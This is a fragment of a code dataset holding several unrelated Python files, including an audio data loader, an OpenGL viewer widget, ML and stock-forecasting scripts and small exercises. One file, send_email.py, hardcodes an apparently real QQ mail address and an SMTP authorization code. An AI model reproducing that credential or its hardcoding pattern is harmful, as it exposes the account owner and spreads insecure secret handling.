= self.sources_paths[idx]\n\n _, noise_waveform = wavfile.read(example_sources_paths['noise_path'])\n _, speech_waveform = wavfile.read(example_sources_paths['speech_path'])\n noise_wav = self.get_padded_tensor(noise_waveform)\n speech_wav = self.get_padded_tensor(speech_waveform)\n\n # Also draw a random noise waveform if available.\n if self.extra_noise_paths:\n file_idx = np.random.randint(0, len(self.extra_noise_paths))\n _, extra_noise_waveform = wavfile.read(\n self.extra_noise_paths[file_idx])\n extra_noise_wav = self.get_padded_tensor(extra_noise_waveform)\n else:\n extra_noise_wav = torch.zeros_like(noise_wav)\n\n return speech_wav, noise_wav, extra_noise_wav\n\n def get_generator(self, batch_size=4, shuffle=True, num_workers=4):\n generator_params = {'batch_size': batch_size,\n 'shuffle': shuffle,\n 'num_workers': num_workers,\n 'drop_last': True}\n return torch.utils.data.DataLoader(self, **generator_params,\n pin_memory=True)\n\n\ndef test_generator():\n dataset_root_p = '/mnt/data/ChunkFedEnhance/'\n batch_size = 3\n sample_rate = 16000\n timelength = 4.0\n speaker_ids = [x for x in range(2)]\n time_samples = int(sample_rate * timelength)\n max_abs_snr = 5.\n data_loader = Dataset(\n root_dirpath=dataset_root_p,\n speaker_ids=speaker_ids,\n available_speech_percentage=0.5,\n split='test', sample_rate=sample_rate, timelength=timelength,\n zero_pad=True, augment=True)\n generator = data_loader.get_generator(batch_size=batch_size, num_workers=1)\n\n for speech_wavs, noise_wavs, extra_noise_wavs in generator:\n assert speech_wavs.shape == (batch_size, time_samples)\n assert noise_wavs.shape == (batch_size, time_samples)\n assert extra_noise_wavs.shape == (batch_size, time_samples)\n break\n\nif __name__ == \"__main__\":\n test_generator()\n","sub_path":"fedenhance/dataset_loader/chunked_libri_fsd.py","file_name":"chunked_libri_fsd.py","file_ext":"py","file_size_in_byte":7213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"391339493","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/7/31 21:18\n# @Author : yimi\n# @File : send_email.py\n# 构造邮件内容 MIMETEXT\n# 发送邮件:登录SMTP服务器(账号,密码) --> 发送 --> 关闭链接 smtplib\nimport smtplib\nimport os\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart # 声明这个邮件是由多部分组成的\nfrom email.mime.application import MIMEApplication\nfrom task_0810_database.config_file import read_path\n\nclass SendEmail:\n def __init__(self, subject, sender, receiver, mail_text, mail_attach, auth_code):\n self.subject = subject\n self.sender = sender\n self.receiver = receiver\n self.mail_text = mail_text\n self.mail_attach = mail_attach\n self.auth_code = auth_code\n self.msg = MIMEMultipart()\n\n def send_email(self):\n # msg=MIMEMultipart()\n self.msg['Subject'] = self.subject\n self.msg['From'] = self.sender\n self.msg['To'] = self.receiver\n\n # 纯文本邮件体\n msg_text=MIMEText(self.mail_text)\n self.msg.attach(msg_text)\n\n # 附加的附件xls, html, rar\n msg_attachment=MIMEApplication(open(self.mail_attach, 'rb').read())\n msg_attachment.add_header('Content-Disposition','attachment',filename=self.mail_attach)\n self.msg.attach(msg_attachment)\n\n # 登录服务器\n s=smtplib.SMTP_SSL('smtp.qq.com', 465)\n s.login(self.sender, self.auth_code) # 账号, 授权码\n s.sendmail(self.sender,self.receiver, self.msg.as_string())\n s.close()\n\n\nif __name__==\"__main__\":\n subject = '薏米的测试报告'\n sender = '1281018605@qq.com'\n receiver = '1281018605@qq.com'\n # receiver = '281417558@qq.com'\n mail_text = 
'api test result'\n    html_path = os.path.join(read_path.test_report_path, 'api_test_result.html')\n    mail_attach = html_path\n    auth_code = 'pxqswpbzogoohahb'\n    SendEmail(subject, sender, receiver, mail_text, mail_attach, auth_code).send_email()\n","sub_path":"Interface_AutoTest_07/common/send_email.py","file_name":"send_email.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"131495016","text":"# Function and PyFunction\nfrom core import aobjects as obj\nimport types as t\nfrom core.error import AILRuntimeError\nimport objects\nimport inspect\nfrom . import types\n\n\ndef pyfunc_func_init(self :obj.AILObject, func :t.FunctionType):\n    self['__pyfunction__'] = func\n    self['__value__'] = func\n\n\ndef pyfunc_func_call(self :obj.AILObject, *args) -> obj.AILObject:\n    fobj = self['__pyfunction__']\n\n    try:\n        rtn = fobj(*args)\n        if rtn is None:\n            return obj.null\n        return obj.ObjectCreater.new_object(objects.wrapper.WRAPPER_TYPE, rtn)\n    except Exception as e:\n        return AILRuntimeError(str(e), 'PythonError')\n\n\ndef pyfunc_func_str(self :obj.AILObject):\n    return '<python function %s at %s>' % (\n        self['__pyfunction__'].__name__, hex(id(self['__pyfunction__'])))\n\n\ndef func_func_init(self, cobj :t.CodeType, globals :dict, name :str):\n    self['__code__'] = cobj\n    self['__globals__'] = globals\n    self['__name__'] = name\n\n\ndef func_func_str(self :obj.AILObject):\n    return '<function %s at %s>' % (self['__name__'], hex(id(self)))\n\n\ndef call(pyfw :obj.AILObject, *args):\n    if inspect.isfunction(pyfw):\n        try:\n            return pyfw(*args)\n        except Exception as e:\n            return AILRuntimeError(str(e), 'PythonError')\n\n    if not isinstance(pyfw, obj.AILObject):\n        return AILRuntimeError('Cannot call an object that is not AILObject', 'TypeError')\n\n    if pyfw['__class__'] not in (PY_FUNCTION_TYPE, FUNCTION_TYPE):\n        return AILRuntimeError('%s is not callable' % pyfw['__class__'], 'TypeError')\n\n    # call the wrapped function once, inside the try, so that its side\n    # effects do not run twice\n    cfunc = pyfw['__pyfunction__']\n\n    try:\n        return cfunc(*args)\n    except Exception as e:\n        return AILRuntimeError(str(e), 'PythonError')\n\n\nFUNCTION_TYPE = obj.AILObjectType('<function>', types.I_FUNC_TYPE,\n                                  __init__=func_func_init,\n                                  __str__=func_func_str,\n                                  __repr__=func_func_str)\n\nPY_FUNCTION_TYPE = obj.AILObjectType('<python function>', types.I_PYFUNC_TYPE,\n                                     __init__=pyfunc_func_init,\n                                     __call__=pyfunc_func_call,\n                                     __str__=pyfunc_func_str,\n                                     __repr__=pyfunc_func_str)\n\n\ndef convert_to_func_wrapper(pyf):\n    import inspect\n\n    if obj.compare_type(pyf, PY_FUNCTION_TYPE) or \\\n            obj.compare_type(pyf, FUNCTION_TYPE):\n        return pyf\n\n    if inspect.isfunction(pyf) or inspect.isbuiltin(pyf):\n        return obj.ObjectCreater.new_object(\n            PY_FUNCTION_TYPE, pyf)\n\n    return obj.convert_to_ail_object(pyf)\n","sub_path":"objects/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"281992974","text":"# import os\n\nfname = \"lesson_64_sample.txt\"\n\n# try:\n#     jabber = open(fname, 'r')\n#     # jabber = open(\"C:\\\\Documents and Settings\\\\tim\\\\My Documents\\\\sample.txt\", 'r')\n\n# except IOError:\n#     print(\"Could not read file: \", fname)\n\n# for line in jabber:\n#     if \"jabberwock\" in line.lower():\n#         print(line, end='')\n\n# jabber.close()\n\n# with open(fname, 'r') as jabber:\n#     for line in jabber:\n#         if \"JAB\" in line.upper():\n#             print(line, end='')\n\n\n# with open(fname, 'r') as jabber:\n#     line = jabber.readline()\n#     while line:\n#         print(line, end='') # end = 
\"\" removes newline \n# line = jabber.readline()\n\n# with open(fname, 'r') as jabber:\n# lines = jabber.readlines()\n# print(lines)\n\n# for line in lines:\n# print(line, end='')\n\n\n# with open(fname, 'r') as jabber:\n# lines = jabber.readlines()\n# print(lines)\n\n# for line in lines[::-1]:\n# print(line, end='')\n\nwith open(fname, 'r') as jabber:\n lines = jabber.read()\n\nfor line in lines[::-1]:\n print(line, end='')\n","sub_path":"Complete Python Masterclass/Source_Codes/lesson_64_fileio.py","file_name":"lesson_64_fileio.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"528718241","text":"from OpenGL.GL import *\nimport weakref\nimport numpy as np\nimport xml.etree.ElementTree as ET\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtWidgets import QOpenGLWidget\nfrom PyQt5.QtCore import QTimer\nfrom PyQt5.QtGui import QSurfaceFormat\nfrom PyQt5.QtGui import QOpenGLVersionProfile\nfrom PyQt5.QtCore import Qt\nimport REESSimulation.api as API\nimport REESSimulation.xml as XML\nimport REESUtility.util as UTIL\nimport REESVisualization.xml as VISXML\nfrom REESVisualization.types import *\nimport REESMesh.factory as MESH_FACTORY\n\n\nOpenGL.ERROR_CHECKING = True\nOpenGL.CHECK_CONTEXT = True\n\n\nclass RenderWidget(QOpenGLWidget):\n\n def __init__(self):\n super(QOpenGLWidget, self).__init__()\n self.resize(400, 400)\n self.m_update_timer = QTimer()\n self.m_update_timer.timeout.connect(self.simulation_step)\n\n self.gl = 0\n\n self.camera = None\n self.light_setup = None\n self.grid = None\n self.clear_color = None\n self.materials = None\n self.scene_graphs = []\n self.movie_recorder = None\n self.contact_scale = 0.5\n\n self.keep_visualization = False # Controls if visualization is loaded whening opening an XML file.\n\n self.engine = None\n\n self.trackball = Trackball() # A track ball used to convert mouse move events into rotations\n self.dolly_mode = False # If on then up-down mouse moves make one moves back and forth towards target\n self.pan_mode = False # If on then one translates in the screen space\n self.trackball_mode = False # If on then one rotates around the camera center\n self.fpv_mode = False # If on then one rotates around the camera position\n self.selection_mode = False # If on then one is making a selection of an object\n self.dolly_sensitivity = 0.025\n self.pan_sensitivity = 0.025\n self.anchor_x = None # Original x-position when doing a mouse operation\n self.anchor_y = None # Original t-position when doing a mouse operation\n self.anchor_eye = None\n self.anchor_center = None\n self.anchor_up = None\n self.height = None # Used to convert from window space into screen space when clicking inside the window\n\n\n def compute_normalized_device_coordinates(self, sx, sy):\n '''\n\n :param sx: X-coordinate of screen position (x-pixel value)\n :param sy: Y-coordinate of screen position (y-pixel value)\n :return:\n '''\n viewport = glGetFloatv(GL_VIEWPORT)\n ratio = self.devicePixelRatio()\n nx = (2.0 * ratio * sx) / viewport[2] - 1.0\n ny = (2.0 * ratio * sy) / viewport[3] - 1.0\n nx = max(-1.0, min(1.0, nx))\n ny = max(-1.0, min(1.0, ny))\n return nx, ny\n\n def initializeGL(self):\n version_profile = QOpenGLVersionProfile()\n version_profile.setVersion(4, 1)\n version_profile.setProfile(QSurfaceFormat.CoreProfile)\n self.gl = self.context().versionFunctions(version_profile)\n if not self.gl:\n raise RuntimeError(\"unable to apply OpenGL version profile\")\n 
self.gl.initializeOpenGLFunctions()\n\n camera, light_setup, materials, clear_color, grid, mov_rec, contact_scale = VISXML.load('resources/scene.xml')\n\n self.camera = camera\n self.light_setup = light_setup\n self.materials = materials\n self.clear_color = clear_color\n self.grid = grid\n self.movie_recorder = mov_rec\n self.contact_scale = contact_scale\n\n self.scene_graphs.clear()\n self.create_grid_scene_graph()\n\n glClearColor(self.clear_color[0], self.clear_color[1], self.clear_color[2], 0.0)\n glEnable(GL_DEPTH_TEST)\n glDepthFunc(GL_LESS)\n glEnable(GL_CULL_FACE)\n\n def create_rigid_bodies_graph(self):\n\n scene_graph = SceneGraph()\n\n scene_graph.camera = self.camera\n scene_graph.light_setup = self.light_setup\n\n vertex_shader = Shader('resources/shaders/vertex.glsl', GL_VERTEX_SHADER)\n geometry_shader = Shader('resources/shaders/geometry.glsl', GL_GEOMETRY_SHADER)\n fragment_shader = Shader('resources/shaders/fragment.glsl', GL_FRAGMENT_SHADER)\n\n scene_graph.program = ShaderProgram([vertex_shader, geometry_shader, fragment_shader])\n\n for shape in self.engine.shapes.values():\n vao = VAO()\n vertex_data, index_data = create_mesh_array_data(shape.mesh)\n vbo = VBO(vertex_data, index_data)\n shape_node = ShapeNode(scene_graph.program, vao, vbo)\n scene_graph.shape_nodes[shape.name] = shape_node\n\n for body in self.engine.rigid_bodies.values():\n shape_node = scene_graph.shape_nodes[body.shape.name]\n instance = InstanceNode(shape_node, self.materials[body.visual_material], body)\n instance.update_transform(body.r, body.q)\n scene_graph.instance_nodes[body.name] = instance\n\n self.scene_graphs.append(scene_graph)\n\n def create_grid_scene_graph(self):\n scene_graph = SceneGraph()\n\n scene_graph.camera = self.camera\n scene_graph.light_setup = self.light_setup\n\n vertex_shader = Shader('resources/shaders/debug_vertex.glsl', GL_VERTEX_SHADER)\n fragment_shader = Shader('resources/shaders/debug_fragment.glsl', GL_FRAGMENT_SHADER)\n\n scene_graph.program = ShaderProgram([vertex_shader, fragment_shader])\n\n vao = VAO()\n vertex_data, index_data = create_wire_grid_data(self.grid)\n vbo = VBO(vertex_data, index_data, make_triangles=False)\n shape_node = ShapeNode(scene_graph.program, vao, vbo)\n instance = InstanceNode(shape_node, self.materials['grid'])\n scene_graph.instance_nodes['grid'] = instance\n\n self.scene_graphs.append(scene_graph)\n\n def create_contact_points_graph(self):\n scene_graph = SceneGraph()\n\n scene_graph.camera = self.camera\n scene_graph.light_setup = self.light_setup\n\n vertex_shader = Shader('resources/shaders/debug_vertex.glsl', GL_VERTEX_SHADER)\n fragment_shader = Shader('resources/shaders/debug_fragment.glsl', GL_FRAGMENT_SHADER)\n\n scene_graph.program = ShaderProgram([vertex_shader, fragment_shader])\n\n vao = VAO()\n slices = 12\n segments = 12\n\n H = 1.0/(1.0 - 1.0/8.0)\n\n base = MESH_FACTORY.make_sphere(H/8.0,slices, segments)\n shaft = MESH_FACTORY.make_cylinder(H/16.0, 5.0*H/8.0, slices)\n head = MESH_FACTORY.make_cone(H/8.0, 2.0*H/8.0, slices)\n MESH.translate(shaft, V3.make(0.0, 5.0*H/16.0, 0.0))\n MESH.translate(head, V3.make(0.0, 5.0*H/8.0, 0.0))\n\n mesh = MESH.join([base, shaft, head])\n\n vertex_data, index_data = create_mesh_array_data(mesh)\n vbo = VBO(vertex_data, index_data)\n shape_node = ShapeNode(scene_graph.program, vao, vbo)\n instance = ContactPointsInstanceNode(shape_node, self.materials['contact'], self.contact_scale, self.engine)\n scene_graph.instance_nodes['contact'] = instance\n\n 
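# --- Editor note (illustrative, not from the original widget.py). The
# arrow glyph assembled above is sized so that it has unit length: with
# H = 1 / (1 - 1/8) = 8/7, the cone tip sits at 5H/8 + 2H/8 = 7H/8 = 1,
# so an instance node can scale the glyph by the desired arrow length
# directly. A quick sanity check of that arithmetic:
H = 1.0 / (1.0 - 1.0 / 8.0)
assert abs((5.0 * H / 8.0 + 2.0 * H / 8.0) - 1.0) < 1e-12
# --- end note ---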
self.scene_graphs.append(scene_graph)\n\n def create_joint_connectors_graph(self):\n scene_graph = SceneGraph()\n\n scene_graph.camera = self.camera\n scene_graph.light_setup = self.light_setup\n\n vertex_shader = Shader('resources/shaders/debug_vertex.glsl', GL_VERTEX_SHADER)\n fragment_shader = Shader('resources/shaders/debug_fragment.glsl', GL_FRAGMENT_SHADER)\n\n scene_graph.program = ShaderProgram([vertex_shader, fragment_shader])\n\n vao = VAO()\n slices = 12\n segments = 12\n\n H = 1.0/(1.0 - 1.0/8.0)\n\n base = MESH_FACTORY.make_sphere(H/8.0,slices, segments)\n shaft = MESH_FACTORY.make_cylinder(H/16.0, 5.0*H/8.0, slices)\n head = MESH_FACTORY.make_cone(H/8.0, 2.0*H/8.0, slices)\n MESH.translate(shaft, V3.make(0.0, 5.0*H/16.0, 0.0))\n MESH.translate(head, V3.make(0.0, 5.0*H/8.0, 0.0))\n\n mesh = MESH.join([base, shaft, head])\n\n vertex_data, index_data = create_mesh_array_data(mesh)\n vbo = VBO(vertex_data, index_data)\n shape_node = ShapeNode(scene_graph.program, vao, vbo)\n\n if 'socket' in self.materials:\n socket_material = self.materials['socket']\n else:\n raise RuntimeError('create_joint_connectors_graph(): Missing socket visual material')\n\n if 'plug' in self.materials:\n plug_material = self.materials['plug']\n else:\n raise RuntimeError('create_joint_connectors_graph(): Missing plug visual material')\n\n instance = JointConnectorsInstanceNode(shape_node,\n socket_material,\n plug_material,\n self.contact_scale,\n self.engine\n )\n scene_graph.instance_nodes['connectors'] = instance\n\n self.scene_graphs.append(scene_graph)\n\n def paintGL(self):\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n for scene_graph in self.scene_graphs:\n scene_graph.render()\n\n def resizeGL(self, width, height):\n glViewport(0, 0, width, height)\n self.height = height\n\n def mouseMoveEvent(self, e):\n x = e.x()\n y = self.height - e.y()\n\n nx, ny = self.compute_normalized_device_coordinates(x, y)\n\n left = (int(e.buttons()) & Qt.LeftButton) != 0\n middle = (int(e.buttons()) & Qt.MidButton) != 0\n right = (int(e.buttons()) & Qt.RightButton) != 0\n ctrl = (int(QApplication.keyboardModifiers()) & Qt.ControlModifier) != 0\n shift = (int(QApplication.keyboardModifiers()) & Qt.ShiftModifier) != 0\n alt = (int(QApplication.keyboardModifiers()) & Qt.AltModifier) != 0\n\n self.camera.update(self.anchor_eye, self.anchor_center, self.anchor_up)\n\n if self.dolly_mode:\n distance = self.dolly_sensitivity * (y - self.anchor_y)\n self.camera.dolly(-distance)\n\n if self.pan_mode:\n x_distance = self.pan_sensitivity * (x - self.anchor_x)\n y_distance = self.pan_sensitivity * (y - self.anchor_y)\n self.camera.pan(-x_distance, -y_distance)\n\n if self.trackball_mode:\n self.trackball.move_to(nx, ny)\n# self.trackball.move_to(x, y)\n self.camera.orbit(self.trackball.rotation_matrix.transpose())\n\n if self.fpv_mode:\n self.trackball.move_to(nx, ny)\n self.camera.rotate(self.trackball.rotation_matrix)\n\n if self.selection_mode:\n p, r = self.camera.get_ray(nx, ny)\n #self.select_tool.move_selection(p, r, self.camera.dof, self.engine)\n #update_render_manager(self.render_manager, self.engine)\n\n if not self.m_update_timer.isActive():\n self.update()\n\n def mousePressEvent(self, e):\n x = e.x()\n y = self.height - e.y()\n\n nx, ny = self.compute_normalized_device_coordinates(x, y)\n\n left = (int(e.buttons()) & Qt.LeftButton) != 0\n middle = (int(e.buttons()) & Qt.MidButton) != 0\n right = (int(e.buttons()) & Qt.RightButton) != 0\n ctrl = (int(QApplication.keyboardModifiers()) & Qt.ControlModifier) 
!= 0\n shift = (int(QApplication.keyboardModifiers()) & Qt.ShiftModifier) != 0\n alt = (int(QApplication.keyboardModifiers()) & Qt.AltModifier) != 0\n\n if alt and left:\n self.dolly_mode = True\n elif shift and left:\n self.pan_mode = True\n self.camera.center_locked = False\n elif ctrl and left:\n self.selection_mode = True\n elif left:\n self.trackball_mode = True\n elif right:\n self.fpv_mode = True\n self.camera.center_locked = False\n\n self.trackball.reset()\n self.anchor_x = x\n self.anchor_y = y\n self.anchor_eye = np.copy(self.camera.eye)\n self.anchor_center = np.copy(self.camera.center)\n self.anchor_up = np.copy(self.camera.up)\n\n if self.trackball_mode:\n self.trackball.click_at(nx, ny)\n\n if self.fpv_mode:\n self.trackball.click_at(nx, ny)\n\n if self.selection_mode:\n p,r = self.camera.get_ray(nx, ny)\n #self.select_tool.select(p, r, self.engine )\n self.selection_mode = True\n\n def mouseReleaseEvent(self, e):\n #if self.selection_mode:\n # self.select_tool.deselect()\n self.dolly_mode = False\n self.pan_mode = False\n self.trackball_mode = False\n self.fpv_mode = False\n self.camera.center_locked = True\n self.selection_mode = False\n\n def simulation_step(self):\n did_step = API.run(self.engine)\n\n if did_step and self.movie_recorder is not None:\n self.movie_recorder.record(self)\n\n self.update()\n\n def open_file(self, filename):\n xml = ET.parse(filename)\n root = xml.getroot()\n\n if not self.keep_visualization:\n camera, light_setup, materials, clear_color, grid, mov_rec, contact_scale = VISXML.load_from_elementtree(root)\n\n self.camera = camera\n self.light_setup = light_setup\n self.materials = materials\n self.clear_color = clear_color\n self.grid = grid\n self.movie_recorder = mov_rec\n self.contact_scale = contact_scale\n\n self.scene_graphs.clear()\n self.create_grid_scene_graph()\n\n self.engine = XML.load_from_elementtree(root)\n self.create_rigid_bodies_graph()\n self.create_contact_points_graph()\n self.create_joint_connectors_graph()\n\n glClearColor(self.clear_color[0], self.clear_color[1], self.clear_color[2], 0.0)\n\n self.m_update_timer.start(1000/self.engine.solver_params.fps)\n\n self.update()\n\n def save_file(self, filename):\n root = ET.Element('scene')\n\n VISXML.save_to_elementtree(self.camera,\n self.light_setup,\n self.materials,\n self.clear_color,\n self.grid,\n self.movie_recorder,\n self.contact_scale,\n root\n )\n\n XML.save_to_elementtree(self.engine, root)\n\n UTIL.xml_pretty_indent(root)\n tree = ET.ElementTree(root)\n tree.write(filename)\n\n def set_keep_visualization(self, keep_it):\n self.keep_visualization = keep_it\n if keep_it:\n print('RenderWidget: Keeping visualization on file open')\n else:\n print('RenderWidget: Loading visualization on file open')\n\n\ndef initialize_opengl():\n format = QSurfaceFormat()\n format.setProfile(QSurfaceFormat.CoreProfile)\n format.setVersion(4, 5)\n format.setSamples(4)\n QSurfaceFormat.setDefaultFormat(format)\n\n","sub_path":"REESVisualization/widget.py","file_name":"widget.py","file_ext":"py","file_size_in_byte":15149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"523082594","text":"class Solution:\n def letterCasePermutation(self, S: str):\n if len(S) == 0:\n return ''\n letters = [ele for ele in S if ele.isalpha()]\n pos = [i for i, c in enumerate(S) if c.isalpha()]\n num = [ele for ele in S if ele.isnumeric()]\n\n diff_perm = 2**len(pos)\n\n letters_uplow = [[ele.upper(), ele.lower()] for ele in letters]\n import itertools\n 
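# --- Hedged editor sketch (an alternative, not the author's solution;
# the helper name is ours). itertools.product can drive the whole case
# permutation directly, without the separate pos/num bookkeeping used
# in this record:
import itertools

def letter_case_permutation(s):
    # each letter expands to (lower, upper); every other char to itself
    choices = [(c.lower(), c.upper()) if c.isalpha() else (c,) for c in s]
    return [''.join(p) for p in itertools.product(*choices)]

# letter_case_permutation('f12d') == ['f12d', 'f12D', 'F12d', 'F12D']
# --- end sketch ---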
comb = [[*S] for i in range(diff_perm)]\n\n for i, p in enumerate(itertools.product(*letters_uplow)):\n for j, ele in enumerate(p):\n comb[i][pos[j]] = ele\n return [''.join(ele) for ele in comb]\n \ns = Solution()\na = 'f12d'\nprint(s.letterCasePermutation(a))\n\n''' \nthis is very easy, have no problem with it\nbasically take all the alpha values out and turn that into product fo iteration\n'''","sub_path":"subsets/784. Letter Case Permutation.py","file_name":"784. Letter Case Permutation.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"259794372","text":"import mock\nimport unittest\n\nfrom gameengine.controller import GameEngine\nfrom gameengine.commands import RunAwayCommand\n\n\nclass GameEngineTestCase(unittest.TestCase):\n def setUp(self):\n self.game = mock.Mock(is_finished=False)\n self.view = mock.Mock(**{\"read.return_value\": None})\n self.engine = GameEngine(self.game, self.view)\n\n def test_get_command_with_valid_command(self):\n self.view.read.return_value = \"OPEN SESAME\"\n with mock.patch(\"gameengine.controller.commands\") as mock_commands:\n command = self.engine.get_command()\n assert command == mock_commands.get.return_value\n self.view.read.assert_called_once_with(prompt=\"> \")\n mock_commands.get.assert_called_once_with(\"open sesame\")\n\n def test_get_command_with_invalid_command(self):\n self.view.read.side_effect = [\"open sesame\", None]\n with mock.patch(\"gameengine.controller.commands\") as mock_commands:\n mock_commands.get.return_value = None\n command = self.engine.get_command()\n self.view.write.assert_called_with(\"I'm sorry, I don't understand.\")\n\n def test_get_command_returns_run_away_command_on_eof(self):\n command = self.engine.get_command()\n assert isinstance(command, RunAwayCommand)\n","sub_path":"test/unit/test_controller.py","file_name":"test_controller.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"313107403","text":"import pandas as pd\nimport matplotlib.pylab as plt\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nimport argparse\nimport matplotlib.pyplot as plt\nfrom statsmodels.tsa.ar_model import AR\nfrom datetime import datetime \nplt.style.use('ggplot')\n\nmonths = {'January':'1', 'February':'2', 'March':'3', 'April':'4', 'May':'5', 'June':'6',\\\n 'July':'7','August':'8', 'September':'9', 'October':'10', 'November':'11', 'December':'12'}\n\ndef format_data (date_str):\n parts = date_str.split(\"-\")\n date = datetime(int(parts[2]), int(months[parts[1]]), int(parts[0]), 0, 0, 0)\n return date \n\n\ndef plot_data (X):\n\n fig = plt.figure(figsize=(12,6))\n ax = fig.add_subplot(111)\n ax.plot(X,'o')\n plt.show()\n \n\nif __name__ == \"__main__\":\n \n parser = argparse.ArgumentParser()\n parser.add_argument('-i','--input-file',help='Input File')\n window = 24\n\n \n args = parser.parse_args()\n\n df = pd.read_csv(args.input_file) \n \n print(df.shape, df.columns)\n\n df['Date'] = [format_data(d) for d in df['Date'].to_list()] \n df.index = df['Date'].to_list()\n df = df.sort_values(by='Date')\n\n #plot_data(df['Open Price'])\n\n X = df['Open Price']\n\n decomposed = seasonal_decompose(X,freq = 12)\n\n x = decomposed.plot() #See note below about this \n plt.rcParams['figure.figsize']=(35,15)\n plt.style.use('ggplot')\n plt.show()\n\n\n df['stationary']=df['Open Price'].diff()\n X = df['stationary'].dropna()\n train_data = 
X.iloc[1:len(X)-window]\n    test_data = X.iloc[len(X)-window:]\n\n    #train the autoregression model\n    model = AR(train_data)\n    model_fitted = model.fit()\n\n    print('The lag value chosen is: %s' % model_fitted.k_ar)\n    print('The coefficients of the model are:\\n %s' % model_fitted.params)\n\n    # make predictions\n    predictions = model_fitted.predict(start=len(train_data),\\\n        end=len(train_data) + len(test_data)-1, dynamic=False)\n    predictions.index = X.index[len(X)-window:]\n\n\n    compare_df = pd.concat([df['stationary'].tail(window),predictions],\\\n        axis=1).rename(columns={'stationary': 'actual', 0:'predicted'})\n\n    #plot the two values\n    plt.plot(compare_df['actual'],label='Actual')\n    plt.plot(compare_df['predicted'],label='Predicted')\n    plt.legend()\n    plt.show()\n\n\n\n","sub_path":"predictive/predict_share_price.py","file_name":"predict_share_price.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"128419806","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, LSTM, Input\nfrom keras.utils import np_utils\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom sklearn.preprocessing import RobustScaler\nfrom sklearn.metrics import mean_squared_error, r2_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.decomposition import PCA\nfrom sklearn.datasets import load_boston\nmodelpath = './model/{epoch:02d} - {val_loss:.4f}.hdf5'\n\nes = EarlyStopping(monitor = 'loss', mode = 'min', patience = 10)\ncp = ModelCheckpoint(filepath = modelpath, monitor = 'val_loss',\n                     mode = 'auto', save_best_only = True)\nscaler = RobustScaler()\npca = PCA(n_components = 10)\n\n\n# 1. Data\nx, y = load_boston(return_X_y = True)\n# print(x.shape)\n# print(y.shape)\n\n# 1-1. Data split\n\n\n# 1-2. Scaling\npca.fit(x)\nx = pca.transform(x)\n# x = scaler.fit_transform(x)\n\nx_train, x_test, y_train, y_test = train_test_split(\n    x, y, test_size = 0.2, shuffle = True,\n    random_state = 77)\n\nprint(x_train.shape)\nprint(x_test.shape)\nprint(y_train.shape)\nprint(y_test.shape)\n\n\n# 2. Modeling\nmodel = Sequential()\nmodel.add(Dense(32, input_shape = (10, ), activation = 'relu'))\nmodel.add(Dense(32, activation = 'relu'))\nmodel.add(Dense(64, activation = 'relu'))\nmodel.add(Dense(64, activation = 'relu'))\nmodel.add(Dense(128, activation = 'relu'))\nmodel.add(Dense(128, activation = 'relu'))\nmodel.add(Dense(1, activation = 'relu'))\n\nmodel.summary()\n\n\n# 3. Compile and train\nmodel.compile(loss = 'mse', metrics = ['mse'], optimizer = 'adam')\nmodel.fit(x_train, y_train, callbacks = [es, cp],\n          epochs = 100, batch_size = 32, verbose = 1,\n          validation_split = 0.25) # key_error: 'val_loss' is raised when cp monitors val_loss but no validation set is given\n\n# print(hist.history.keys())\n\n\n# 4. Model evaluation\nres = model.evaluate(x_test, y_test)\nprint(res)\n\ny_pred = model.predict(x_test)\nprint(\"y_pred : \", y_pred)\n\n# 5. Performance metric evaluation\nprint(\"R2 : \", r2_score(y_test, y_pred))\n\n\n'''\nResult\nR2 Score = 0.7801983681184715\n'''","sub_path":"keras/keras73_boston_dnn.py","file_name":"keras73_boston_dnn.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"414454679","text":"#This is a function that objectifies searching for things\nimport sqlite3\nfrom tkinter import *\nconn = sqlite3.connect('names.db')\nconn.row_factory = sqlite3.Row  # needed so rows support row['firstname'] below\ncursor = conn.cursor()\n\ndef throwErrorBox(title, message):\n    window = Tk()\n    window.title(title)\n    l1 = Label(window, text=message)\n    l1.pack()\n    b1 = Button(window, text=\"Okay\", command=window.destroy)\n    b1.pack()\n    #Start the loop\n    window.mainloop()\n\n\ndef searchFor(searchParam):\n    results = cursor.execute(\"SELECT * FROM names WHERE firstname LIKE ?\", (searchParam,))\n    for row in results:\n        assert row[3] == row['firstname']\n\n    conn.commit()\n    conn.close()\n","sub_path":"searchDB.py","file_name":"searchDB.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
